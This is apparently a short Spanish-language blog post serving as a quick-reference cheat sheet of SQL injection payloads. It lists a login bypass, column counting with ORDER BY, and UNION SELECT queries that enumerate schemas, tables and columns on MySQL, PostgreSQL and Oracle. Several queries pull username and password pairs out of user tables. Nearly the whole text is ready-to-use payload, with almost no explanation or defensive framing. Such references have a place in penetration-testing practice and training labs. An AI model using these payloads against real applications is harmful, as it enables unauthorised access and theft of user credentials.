En este post, proporcionaremos ejemplos y técnicas directo al grano para tener una referencia rápida.
El objetivo es manipular la condición para que siempre sea verdadera, de modo que la consulta retorne todos los registros en la tabla.
' or 1=1-- -
Realizamos la query en el apartado de autenticación.
'-- -
' order by (n_columnas)-- -
' ORDER BY 2-- -
' UNION SELECT NULL,'Probando'-- -
' UNION SELECT 'Probando',NULL-- -
En donde NULL es la columna en donde quiero extraer los datos:
' UNION SELECT NULL,NULL,NULL-- -
' UNION SELECT 'VkItMD',NULL,NULL-- -
' UNION SELECT NULL,schema_name from information_schema.schemata-- -
' UNION SELECT NULL,group_concat(schema_name) from information_schema.schemata-- -
' UNION SELECT NULL,database()-- -
' UNION SELECT NULL, group_concat(username,':',password) from tienda.users-- -
# En donde tienda es la que esta en uso
' UNION SELECT table_name,NULL from information_schema.tables-- -
' UNION SELECT table_name,NULL from information_schema.tables where table_schema = 'public'-- -
' UNION SELECT column_name,NULL from information_schema.columns where table_schema = 'DB' and table_name = 'tabla'-- -
' UNION SELECT username,password from users-- -
' UNION SELECT NULL,group_concat(username,':',password) from users-- -
' UNION SELECT NULL,group_concat(username,'0x3a',password) from users-- -
' UNION SELECT NULL,username||':'||password from users-- -
' UNION SELECT NULL,concat(username,':',password) from users-- -
' ORDER BY 2-- -
' UNION SELECT NULL,NULL from dual-- -
' UNION SELECT NULL,table_name from all_tables-- -
' UNION SELECT NULL,owner from all_tables-- -
' UNION SELECT NULL,table_name from all_tables where owner = 'PETER'-- -
' UNION SELECT NULL,column_name from all_tab_columns where table_name = 'USERS_VFDYAP'-- -
' UNION SELECT NULL,USERNAME_GTWJZC||':'||PASSWORD_TBLRSL FROM USERS_VFDYAP-- -